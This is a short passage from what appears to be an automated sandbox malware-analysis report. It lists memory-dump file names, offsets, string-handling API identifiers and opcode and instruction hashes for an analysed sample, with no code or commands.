                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                          • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                          • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                          • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C